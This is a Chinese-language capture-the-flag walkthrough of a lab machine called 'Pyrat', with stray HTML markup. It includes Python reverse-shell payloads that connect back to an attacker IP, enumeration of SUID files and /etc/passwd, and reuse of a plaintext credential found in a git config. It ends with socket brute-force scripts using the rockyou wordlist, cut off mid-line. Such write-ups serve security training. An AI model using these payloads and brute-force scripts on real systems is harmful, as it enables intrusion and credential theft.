![\"image-20240417191845673\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404171918347.png\")
<\/div><\/p>\n![\"image-20240401145246202\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404171918662.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\nnmap -sCV -p 1-65535 172.20.10.13<\/code><\/pre>\nPORT STATE SERVICE VERSION\n22\/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)\n| 256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)\n|_ 256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)\n8000\/tcp open http-alt SimpleHTTP\/0.6 Python\/3.11.2\n|_http-title: Site doesn't have a title (text\/html; charset=utf-8).\n|_http-server-header: SimpleHTTP\/0.6 Python\/3.11.2\n| fingerprint-strings: \n| DNSStatusRequestTCP, DNSVersionBindReqTCP, LANDesk-RC, Socks4, X11Probe: \n| source code string cannot contain null bytes\n| FourOhFourRequest, LPDString, SIPOptions: \n| invalid syntax (<string>, line 1)\n| GetRequest: \n| name 'GET' is not defined\n| HTTPOptions, RTSPRequest: \n| name 'OPTIONS' is not defined\n| Help: \n| name 'HELP' is not defined\n| Kerberos: \n| 'utf-8' codec can't decode byte 0x81 in position 5: invalid start byte\n| LDAPBindReq: \n| 'utf-8' codec can't decode byte 0x80 in position 12: invalid start byte\n| LDAPSearchReq: \n| 'utf-8' codec can't decode byte 0x84 in position 1: invalid start byte\n| RPCCheck: \n| 'utf-8' codec can't decode byte 0x80 in position 0: invalid start byte\n| SMBProgNeg: \n| 'utf-8' codec can't decode byte 0xa4 in position 3: invalid start byte\n| SSLSessionReq: \n| 'utf-8' codec can't decode byte 0xd7 in position 13: invalid continuation byte\n| Socks5: \n| 'utf-8' codec can't decode byte 0x80 in position 5: invalid start byte\n| TLSSessionReq: \n| 'utf-8' codec can't decode byte 0xa7 in position 13: invalid start byte\n| TerminalServerCookie: \n|_ 'utf-8' codec can't decode byte 0xe0 in position 5: invalid continuation byte\n|_http-open-proxy: Proxy might be redirecting requests\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port8000-TCP:V=7.94SVN%I=7%D=4\/1%Time=660A59F0%P=x86_64-pc-linux-gnu%r(\nSF:GenericLines,1,"\\n")%r(GetRequest,1A,"name\\x20'GET'\\x20is\\x20not\\x20def\nSF:ined\\n")%r(X11Probe,2D,"source\\x20code\\x20string\\x20cannot\\x20contain\\x\nSF:20null\\x20bytes\\n")%r(FourOhFourRequest,22,"invalid\\x20syntax\\x20\\(<str\nSF:ing>,\\x20line\\x201\\)\\n")%r(Socks5,47,"'utf-8'\\x20codec\\x20can't\\x20deco\nSF:de\\x20byte\\x200x80\\x20in\\x20position\\x205:\\x20invalid\\x20start\\x20byte\\\nSF:n")%r(Socks4,2D,"source\\x20code\\x20string\\x20cannot\\x20contain\\x20null\\\nSF:x20bytes\\n")%r(HTTPOptions,1E,"name\\x20'OPTIONS'\\x20is\\x20not\\x20define\nSF:d\\n")%r(RTSPRequest,1E,"name\\x20'OPTIONS'\\x20is\\x20not\\x20defined\\n")%r\nSF:(RPCCheck,47,"'utf-8'\\x20codec\\x20can't\\x20decode\\x20byte\\x200x80\\x20in\nSF:\\x20position\\x200:\\x20invalid\\x20start\\x20byte\\n")%r(DNSVersionBindReqT\nSF:CP,2D,"source\\x20code\\x20string\\x20cannot\\x20contain\\x20null\\x20bytes\\n\nSF:")%r(DNSStatusRequestTCP,2D,"source\\x20code\\x20string\\x20cannot\\x20cont\nSF:ain\\x20null\\x20bytes\\n")%r(Help,1B,"name\\x20'HELP'\\x20is\\x20not\\x20defi\nSF:ned\\n")%r(SSLSessionReq,4F,"'utf-8'\\x20codec\\x20can't\\x20decode\\x20byte\nSF:\\x200xd7\\x20in\\x20position\\x2013:\\x20invalid\\x20continuation\\x20byte\\n"\nSF:)%r(TerminalServerCookie,4E,"'utf-8'\\x20codec\\x20can't\\x20decode\\x20byt\nSF:e\\x200xe0\\x20in\\x20position\\x205:\\x20invalid\\x20continuation\\x20byte\\n"\nSF:)%r(TLSSessionReq,48,"'utf-8'\\x20codec\\x20can't\\x20decode\\x20byte\\x200x\nSF:a7\\x20in\\x20position\\x2013:\\x20invalid\\x20start\\x20byte\\n")%r(Kerberos,\nSF:47,"'utf-8'\\x20codec\\x20can't\\x20decode\\x20byte\\x200x81\\x20in\\x20positi\nSF:on\\x205:\\x20invalid\\x20start\\x20byte\\n")%r(SMBProgNeg,47,"'utf-8'\\x20co\nSF:dec\\x20can't\\x20decode\\x20byte\\x200xa4\\x20in\\x20position\\x203:\\x20inval\nSF:id\\x20start\\x20byte\\n")%r(LPDString,22,"invalid\\x20syntax\\x20\\(<string>\nSF:,\\x20line\\x201\\)\\n")%r(LDAPSearchReq,47,"'utf-8'\\x20codec\\x20can't\\x20d\nSF:ecode\\x20byte\\x200x84\\x20in\\x20position\\x201:\\x20invalid\\x20start\\x20by\nSF:te\\n")%r(LDAPBindReq,48,"'utf-8'\\x20codec\\x20can't\\x20decode\\x20byte\\x2\nSF:00x80\\x20in\\x20position\\x2012:\\x20invalid\\x20start\\x20byte\\n")%r(SIPOpt\nSF:ions,22,"invalid\\x20syntax\\x20\\(<string>,\\x20line\\x201\\)\\n")%r(LANDesk-\nSF:RC,2D,"source\\x20code\\x20string\\x20cannot\\x20contain\\x20null\\x20bytes\\n\nSF:");\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u6f0f\u6d1e\u5229\u7528<\/h2>\n
\u5148\u8bbf\u95ee\u4e00\u4e0b\u5b83\u76848000<\/code>\u7aef\u53e3\uff0c\u5c1d\u8bd5\u53d1\u6398\u4fe1\u606f\uff1a<\/p>\n![\"image-20240401145457040\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u76f4\u63a5\u8fde\u63a5\u8bd5\u8bd5\uff1a<\/p>\n
nc 172.20.10.13 8000\nwhoami;id\nname 'whoami' is not defined\nhelp\n\n?\ninvalid syntax (<string>, line 1)\nls\nname 'ls' is not defined\n-V \nname 'V' is not defined\nimport pty;pty.spawn("\/bin\/bash")\ninvalid character in identifier (<string>, line 1)\nimport os<\/code><\/pre>\n\u770b\u6765\u53ef\u4ee5\u6267\u884cpython\u8bed\u53e5\uff0c\u5c1d\u8bd5\u53cd\u5f39shell\u3002<\/p>\n
import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("172.20.10.8"),int(os.getenv("1234"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("\/bin\/sh")\n# int() argument must be a string, a bytes-like object or a number, not 'NoneType'<\/code><\/pre>\n\u6362\u4e00\u4e2a\uff1a<\/p>\n
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.20.10.8",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["\/bin\/sh","-i"]);<\/code><\/pre>\npwncat-cs -lp 1234<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@Pyrat:\/root$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@Pyrat:\/root$ ls -la\nls: cannot open directory '.': Permission denied\n(remote) www-data@Pyrat:\/root$ cd \/tmp\n(remote) www-data@Pyrat:\/tmp$ ls\npymp-tohv0yte\nsystemd-private-fee3f836921b4df4ad7c2b30b4d4a50b-ModemManager.service-2N2sVh\nsystemd-private-fee3f836921b4df4ad7c2b30b4d4a50b-systemd-logind.service-fMUUzi\nsystemd-private-fee3f836921b4df4ad7c2b30b4d4a50b-systemd-resolved.service-bXLClh\nsystemd-private-fee3f836921b4df4ad7c2b30b4d4a50b-systemd-timesyncd.service-3pF6Th\n(remote) www-data@Pyrat:\/tmp$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/at\n\/usr\/bin\/fusermount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chfn\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\n\/usr\/bin\/passwd\n\/usr\/bin\/mount\n\/usr\/bin\/su\n\/usr\/bin\/newgrp\n\/usr\/bin\/pkexec\n\/usr\/bin\/umount\n(remote) www-data@Pyrat:\/tmp$ cd \/var\/www\/html\nbash: cd: \/var\/www\/html: No such file or directory\n(remote) www-data@Pyrat:\/tmp$ cd \/var\n(remote) www-data@Pyrat:\/var$ ls\nbackups cache crash lib local lock log mail opt run spool tmp\n(remote) www-data@Pyrat:\/var$ mail\nmail: cannot stat `\/root\/.mail': Permission denied\nmail: Cannot open `\/root\/.mailrc': Permission denied\nNo mail for www-data\n(remote) www-data@Pyrat:\/var$ cd backups\n(remote) www-data@Pyrat:\/var\/backups$ ls\napt.extended_states.0 apt.extended_states.1.gz\n(remote) www-data@Pyrat:\/var\/backups$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-timesync:x:102:104:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:106::\/nonexistent:\/usr\/sbin\/nologin\nsyslog:x:104:110::\/home\/syslog:\/usr\/sbin\/nologin\n_apt:x:105:65534::\/nonexistent:\/usr\/sbin\/nologin\ntss:x:106:111:TPM software stack,,,:\/var\/lib\/tpm:\/bin\/false\nuuidd:x:107:112::\/run\/uuidd:\/usr\/sbin\/nologin\ntcpdump:x:108:113::\/nonexistent:\/usr\/sbin\/nologin\nlandscape:x:109:115::\/var\/lib\/landscape:\/usr\/sbin\/nologin\npollinate:x:110:1::\/var\/cache\/pollinate:\/bin\/false\nusbmux:x:111:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/usr\/sbin\/nologin\nsshd:x:112:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nlxd:x:998:100::\/var\/snap\/lxd\/common\/lxd:\/bin\/false\nthink:x:1000:1000:,,,:\/home\/think:\/bin\/bash\nfwupd-refresh:x:113:117:fwupd-refresh user,,,:\/run\/systemd:\/usr\/sbin\/nologin\npostfix:x:114:119::\/var\/spool\/postfix:\/usr\/sbin\/nologin\n(remote) www-data@Pyrat:\/var\/backups$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# | .------------- hour (0 - 23)\n# | | .---------- day of month (1 - 31)\n# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...\n# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# | | | | |\n# * * * * * user-name command to be executed\n17 * * * * root cd \/ && run-parts --report \/etc\/cron.hourly\n25 6 * * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.daily )\n47 6 * * 7 root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.weekly )\n52 6 1 * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.monthly )\n#\ncat: \/etc\/cron.weekly: Is a directory\n(remote) www-data@Pyrat:\/var\/backups$ cd \/\n(remote) www-data@Pyrat:\/$ ls\nbin dev home lib32 libx32 media opt root sbin swap.img tmp var\nboot etc lib lib64 lost+found mnt proc run srv sys usr\n(remote) www-data@Pyrat:\/$ cd opt\n(remote) www-data@Pyrat:\/opt$ ls -la\ntotal 12\ndrwxr-xr-x 3 root root 4096 Jun 21 2023 .\ndrwxr-xr-x 18 root root 4096 Dec 22 13:22 ..\ndrwxrwxr-x 3 think think 4096 Jun 21 2023 dev\n(remote) www-data@Pyrat:\/opt$ cd dev\n(remote) www-data@Pyrat:\/opt\/dev$ ls -la\ntotal 12\ndrwxrwxr-x 3 think think 4096 Jun 21 2023 .\ndrwxr-xr-x 3 root root 4096 Jun 21 2023 ..\ndrwxrwxr-x 8 think think 4096 Jun 21 2023 .git\n(remote) www-data@Pyrat:\/opt\/dev$ cd .git\n(remote) www-data@Pyrat:\/opt\/dev\/.git$ ls -la\ntotal 52\ndrwxrwxr-x 8 think think 4096 Jun 21 2023 .\ndrwxrwxr-x 3 think think 4096 Jun 21 2023 ..\ndrwxrwxr-x 2 think think 4096 Jun 21 2023 branches\n-rw-rw-r-- 1 think think 21 Jun 21 2023 COMMIT_EDITMSG\n-rw-rw-r-- 1 think think 296 Jun 21 2023 config\n-rw-rw-r-- 1 think think 73 Jun 21 2023 description\n-rw-rw-r-- 1 think think 23 Jun 21 2023 HEAD\ndrwxrwxr-x 2 think think 4096 Jun 21 2023 hooks\n-rw-rw-r-- 1 think think 145 Jun 21 2023 index\ndrwxrwxr-x 2 think think 4096 Jun 21 2023 info\ndrwxrwxr-x 3 think think 4096 Jun 21 2023 logs\ndrwxrwxr-x 7 think think 4096 Jun 21 2023 objects\ndrwxrwxr-x 4 think think 4096 Jun 21 2023 refs\n(remote) www-data@Pyrat:\/opt\/dev\/.git$ cat config\n[core]\n repositoryformatversion = 0\n filemode = true\n bare = false\n logallrefupdates = true\n[user]\n name = Jose Mario\n email = josemlwdf@github.com\n\n[credential]\n helper = cache --timeout=3600\n\n[credential "https:\/\/github.com"]\n username = think\n password = _TH1NKINGPirate$_<\/code><\/pre>\n\u5207\u6362\u81f3think\u7528\u6237<\/h3>\n
\u65e0\u610f\u95f4\u627e\u5230\u4e86\u8d26\u53f7\u5bc6\u7801\uff0c\u5207\u6362\u7528\u6237<\/p>\n
think\n_TH1NKINGPirate$_<\/code><\/pre>\n\u4fe1\u606f\u641c\u96c6<\/h3>\nthink@Pyrat:\/opt\/dev\/.git$ ls -la\ntotal 52\ndrwxrwxr-x 8 think think 4096 Jun 21 2023 .\ndrwxrwxr-x 3 think think 4096 Jun 21 2023 ..\ndrwxrwxr-x 2 think think 4096 Jun 21 2023 branches\n-rw-rw-r-- 1 think think 21 Jun 21 2023 COMMIT_EDITMSG\n-rw-rw-r-- 1 think think 296 Jun 21 2023 config\n-rw-rw-r-- 1 think think 73 Jun 21 2023 description\n-rw-rw-r-- 1 think think 23 Jun 21 2023 HEAD\ndrwxrwxr-x 2 think think 4096 Jun 21 2023 hooks\n-rw-rw-r-- 1 think think 145 Jun 21 2023 index\ndrwxrwxr-x 2 think think 4096 Jun 21 2023 info\ndrwxrwxr-x 3 think think 4096 Jun 21 2023 logs\ndrwxrwxr-x 7 think think 4096 Jun 21 2023 objects\ndrwxrwxr-x 4 think think 4096 Jun 21 2023 refs\nthink@Pyrat:\/opt\/dev\/.git$ sudo -l\n[sudo] password for think: \nSorry, user think may not run sudo on pyrat.\nthink@Pyrat:\/opt\/dev\/.git$ git log\ncommit 0a3c36d66369fd4b07ddca72e5379461a63470bf (HEAD -> master)\nAuthor: Jose Mario <josemlwdf@github.com>\nDate: Wed Jun 21 09:32:14 2023 +0000\n\n Added shell endpoint\nthink@Pyrat:\/opt\/dev\/.git$ git show\ncommit 0a3c36d66369fd4b07ddca72e5379461a63470bf (HEAD -> master)\nAuthor: Jose Mario <josemlwdf@github.com>\nDate: Wed Jun 21 09:32:14 2023 +0000\n\n Added shell endpoint\n\ndiff --git a\/pyrat.py.old b\/pyrat.py.old\nnew file mode 100644\nindex 0000000..ce425cf\n--- \/dev\/null\n+++ b\/pyrat.py.old\n@@ -0,0 +1,27 @@\n+...............................................\n+\n+def switch_case(client_socket, data):\n+ if data == 'some_endpoint':\n+ get_this_enpoint(client_socket)\n+ else:\n+ # Check socket is admin and downgrade if is not aprooved\n+ uid = os.getuid()\n+ if (uid == 0):\n+ change_uid()\n+\n+ if data == 'shell':\n+ shell(client_socket)\n+ else:\n+ exec_python(client_socket, data)\n+\n+def shell(client_socket):\n+ try:\n+ import pty\n+ os.dup2(client_socket.fileno(), 0)\n+ os.dup2(client_socket.fileno(), 1)\n+ os.dup2(client_socket.fileno(), 2)\n+ pty.spawn("\/bin\/sh")\n+ except Exception as e:\n+ send_data(client_socket, e\n+\n+...............................................\nthink@Pyrat:\/opt\/dev\/.git$ ps aux | grep "root"\n# \u4ec5\u5c55\u793a\u90e8\u5206\uff0c\u53d1\u73b0\u5927\u91cf\u7684pyrat\u3002\u3002\u3002\u3002\nroot 1506 1.3 0.5 22048 11584 ? R 06:56 0:20 python3 \/root\/pyrat.py\nwww-data 1519 1.3 0.5 22184 11952 ? R 06:59 0:17 python3 \/root\/pyrat.py\nroot 1553 0.0 0.0 0 0 ? I 07:01 0:00 [kworker\/0:1-events]\nwww-data 1575 0.0 0.6 22184 12368 ? S 07:04 0:00 python3 \/root\/pyrat.py\nroot 1614 0.0 0.0 0 0 ? I 07:09 0:00 [kworker\/u2:2-events_power_efficient]\nroot 1771 0.0 0.0 0 0 ? I 07:16 0:00 [kworker\/u2:1-events_power_efficient]\nroot 1797 0.0 0.1 8784 3992 pts\/0 S 07:17 0:00 su think\nroot 1817 0.0 0.0 0 0 ? I 07:17 0:00 [kworker\/0:0-events]\nroot 1865 0.0 0.0 0 0 ? I 07:21 0:00 [kworker\/u2:0-events_unbound]\nthink 1867 0.0 0.0 6432 660 pts\/0 S+ 07:21 0:00 grep --color=auto root<\/code><\/pre>\n\u731c\u6d4b\u662f\u6709\u4e9b\u5173\u8054\u7684\u3002<\/p>\n
\u8ba9chatgpt\u89e3\u8bfb\u4e00\u4e0b\uff1a<\/p>\n
def switch_case(client_socket, data):\n if data == 'some_endpoint':\n get_this_enpoint(client_socket)\n else:\n # Check if the socket is admin and downgrade if not approved\n uid = os.getuid()\n if uid == 0: # Check if the user is root\/administrator\n change_uid() # If yes, change to a non-administrator user\n\n if data == 'shell':\n shell(client_socket) # If the data is 'shell', invoke the shell function\n else:\n exec_python(client_socket, data) # Otherwise, execute Python code\n\ndef shell(client_socket):\n try:\n import pty\n os.dup2(client_socket.fileno(), 0) # Redirect standard input\n os.dup2(client_socket.fileno(), 1) # Redirect standard output\n os.dup2(client_socket.fileno(), 2) # Redirect standard error\n pty.spawn("\/bin\/sh") # Start a shell process\n except Exception as e:\n send_data(client_socket, e) # If an exception occurs, send the error message back to the client<\/code><\/pre>\n\u6240\u4ee5\u6211\u4eec\u60f3\u8981\u6267\u884c\u7684\u5c31\u662f\u8fd9\u4e2ashell\u3002\u3002\u8ba9root\u7684pyrat\u8fd0\u884c\u5f39\u51fashell\u7ed9\u6211\u4eec\uff1a<\/p>\n
<\/div><\/p>\n\u4e0b\u9762\u60f3\u529e\u6cd5\u641e\u4e00\u4e0b\uff1a<\/p>\n
\u4e0a\u7f51\u641c\u4e00\u4e0b\u8fd9\u4e2aPyrat\u662f\u4e2a\u5565\uff1a<\/p>\n
\nPyRat \u662f\u4e00\u4e2a\u7528\u6237\u53cb\u597d\u7684 Python \u5e93\uff0c\u7528\u4e8e\u5206\u6790\u6765\u81ea DeepLabCut \u7684\u6570\u636e\u3002\u65e8\u5728\u5e2e\u52a9\u4e0d\u719f\u6089\u7f16\u7a0b\u7684\u7814\u7a76\u4eba\u5458\u66f4\u7b80\u5355\u5730\u8fdb\u884c\u52a8\u7269\u884c\u4e3a\u5206\u6790\u3002<\/p>\n
PyRat \u662f\u4e00\u4e2a\u7528\u4e8e\u540e\u5904\u7406\u5408\u6210\u5b54\u5f84\u96f7\u8fbe (SAR) \u6570\u636e\u7684\u7075\u6d3b\u6846\u67b6\u3002\u5b83\u662f\u4e3a\u673a\u8f7d\u548c\u661f\u8f7d\u6570\u636e\u800c\u8bbe\u8ba1\u7684\uff0c\u7279\u522b\u4e13\u6ce8\u4e8e\u63d0\u4f9b\u4e00\u4e2a\u7b80\u5355\u7684\u57fa\u4e8e\u63d2\u4ef6\u7684\u7f16\u7a0b\u63a5\u53e3\u3002<\/p>\n
Python Remote Administrations Tools<\/p>\n<\/blockquote>\n
\u5f88\u660e\u663e\u662f\u7b2c\u4e09\u4e2a\uff0c\u8fd9\u91cc\u7684\u601d\u8def\u662f\u7206\u7834\u3002\u3002\u3002\u3002\uff08\u5077\u770bwp\uff09<\/p>\n
\u67e5\u770b\/var\/mail<\/code>\uff0c\u5b58\u5728\u90ae\u4ef6<\/p>\nFrom root@pyrat Thu Jun 15 09:08:55 2023\nReturn-Path: <root@pyrat>\nX-Original-To: think@pyrat\nDelivered-To: think@pyrat\nReceived: by pyrat.localdomain (Postfix, from userid 0)\n id 2E4312141; Thu, 15 Jun 2023 09:08:55 +0000 (UTC)\nSubject: Hello\nTo: <think@pyrat>\nX-Mailer: mail (GNU Mailutils 3.7)\nMessage-Id: <20230615090855.2E4312141@pyrat.localdomain>\nDate: Thu, 15 Jun 2023 09:08:55 +0000 (UTC)\nFrom: Dbile Admen <root@pyrat>\n\nHello jose, I wanted to tell you that i have installed the RAT you posted on your GitHub page, i'll test it tonight so don't be scared if you see it running. Regards, Dbile Admen<\/code><\/pre>\n\u7136\u540e\u76f4\u63a5\u5728\u4f5c\u8005\u7684github\u627e\u5230\u4e86https:\/\/github.com\/josemlwdf\/PyRAT<\/p>\n
\u67e5\u770b\u6e90\u4ee3\u7801\uff0c\u53d1\u73b0\u4e86\uff1a<\/p>\n
<\/div><\/p>\n\u7528\u6237\u540d\u4e3aadmin<\/code>\uff0c\u8fd8\u627e\u5230\u4e00\u4e2a\u5bc6\u7801\uff1a<\/p>\n<\/div><\/p>\n\u4e3atestpass<\/code>\uff0c\u4f46\u662f\u6d4b\u8bd5\u8fc7\u53d1\u73b0\u4e0d\u662f\u8fd9\u4e2a\uff0c\u4f46\u662f\u7528\u6237\u4f3c\u4e4e\u662f\u8fd9\u4e2a\u3002<\/p>\n\u5728\u4ed6\u7684README.txt<\/code>\u4e2d\u6709\u8fd9\u51e0\u53e5\u8bdd\uff1a<\/p>\nAfter connecting, you can interact with the script using the following commands:<\/p>\n
\n- Admin<\/strong>: To access the admin functionality, type
admin<\/code> and press Enter. You will be prompted to enter a password. Enter the password and press Enter. If the password is correct, you will see the message "Welcome Admin!!! Type 'shell' to begin". You can then proceed to use the shell functionality.<\/li>\n- Shell<\/strong>: To access the shell functionality, type
shell<\/code> and press Enter. This will spawn a shell on the server, allowing you to execute commands. You can enter any valid shell command, and the output will be displayed on your nc<\/code> session.<\/li>\n- Python Interactive<\/strong>: To execute python commands on the server just send your python commands and it will be passed to the
exec<\/code> function.<\/li>\n<\/ul>\n\u4e00\u76f4\u6401\u7f6e\u6ca1\u6709\u505a\uff0c\u540e\u6765\u641e\u4e86\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/pyrat]\n\u2514\u2500$ sudo arp-scan -l -I eth1 \n[sudo] password for kali: \nInterface: eth1, type: EN10MB, MAC: 08:00:27:fb:51:ff, IPv4: 192.168.0.143\nStarting arp-scan 1.10.0 with 256 hosts (https:\/\/github.com\/royhills\/arp-scan)\n192.168.0.1 b0:0a:d5:b9:c2:92 zte corporation\n192.168.0.152 34:2e:b7:08:3d:a1 Intel Corporate\n192.168.0.179 08:00:27:99:ba:43 PCS Systemtechnik GmbH\n\n3 packets received by filter, 0 packets dropped by kernel\nEnding arp-scan 1.10.0: 256 hosts scanned in 2.014 seconds (127.11 hosts\/sec). 3 responded\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/pyrat]\n\u2514\u2500$ ssh think@192.168.0.179 \nThe authenticity of host '192.168.0.179 (192.168.0.179)' can't be established.\nED25519 key fingerprint is SHA256:Ndgax\/DOZA6JS00F3afY6VbwjVhV2fg5OAMP9TqPAOs.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '192.168.0.179' (ED25519) to the list of known hosts.\nthink@192.168.0.179's password: \nWelcome to Ubuntu 20.04.6 LTS (GNU\/Linux 5.4.0-150-generic x86_64)\n\n * Documentation: https:\/\/help.ubuntu.com\n * Management: https:\/\/landscape.canonical.com\n * Support: https:\/\/ubuntu.com\/advantage\n\n System information as of Tue 16 Apr 2024 07:32:00 AM UTC\n\n System load: 0.09 Processes: 123\n Usage of \/: 45.7% of 9.75GB Users logged in: 0\n Memory usage: 10% IPv4 address for enp0s3: 192.168.0.179\n Swap usage: 0%\n\n * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s\n just raised the bar for easy, resilient and secure K8s cluster deployment.\n\n https:\/\/ubuntu.com\/engage\/secure-kubernetes-at-the-edge\n\nExpanded Security Maintenance for Applications is not enabled.\n0 updates can be applied immediately.\nEnable ESM Apps to receive additional future security updates.\nSee https:\/\/ubuntu.com\/esm or run: sudo pro status\n\nThe list of available updates is more than a week old.\nTo check for new updates run: sudo apt update\n\nYou have mail.\nLast login: Mon Apr 1 10:13:01 2024 from 172.20.10.8\nthink@Pyrat:~$ <\/code><\/pre>\n\u4f5c\u8005\u89e3\u6cd5<\/h3>\nimport socket\n# Define the server's address and port\nserver_address = ('192.168.80.128', 8000) # Replace with your server's address and port\n\ndef send_word(word):\n # Create a socket object\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n # Connect to the server\n client_socket.connect(server_address)\n\n # Send the word to the server\n client_socket.sendall(word.encode())\n\n # Receive data from the server (if applicable)\n response = client_socket.recv(1024)\n response = response.decode()\n if not word in response:\n print(f"Sent: {word} | Received: {response}")\n\n except ConnectionRefusedError:\n print("Connection was refused. Is the server running?")\n finally:\n # Close the socket connection\n client_socket.close()\n\ndef read_wordlist_from_file(filename):\n with open(filename, 'r') as file:\n wordlist = file.readlines()\n return [word.strip() for word in wordlist]\n\n# Path to the wordlist file\nwordlist_filename = 'wordlist.txt'\n\n# Read words from the file\nwords = read_wordlist_from_file(wordlist_filename)\n\n# Iterate through the words and send each one to the server\nfor word in words:\n send_word(word)<\/code><\/pre>\n\u8fd9\u4e2a\u662f\u7528\u6765\u641e\u8d26\u53f7\u7684\uff0c\u4e0b\u9762\u662f\u7206\u7834\u5bc6\u7801\u7684\uff1a<\/p>\n
def test_this(password):\n # Create a socket object\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n # Connect to the server\n client_socket.connect(server_address)\n # Send the word to the server\n client_socket.sendall('admin'.encode())\n # Receive data from the server (if applicable)\n response = client_socket.recv(1024)\n response = response.decode()\n if 'Password' in response:\n client_socket.sendall(password)\n\n response = client_socket.recv(1024)\n response = response.decode()\n\n if not 'Password' in response:\n print('Password:', password)\n\n except ConnectionRefusedError:\n print("Connection was refused. Is the server running?")\n finally:\n # Close the socket connection\n client_socket.close()\n\ndef test_creds():\n from threading import Thread\n wordlist = '\/usr\/share\/seclists\/Passwords\/Leaked-Databases\/rockyou.txt'\n passwords = read_wordlist_from_file(wordlist)\n threads = []\n for password in passwords:\n thread = Thread(target=test_this, 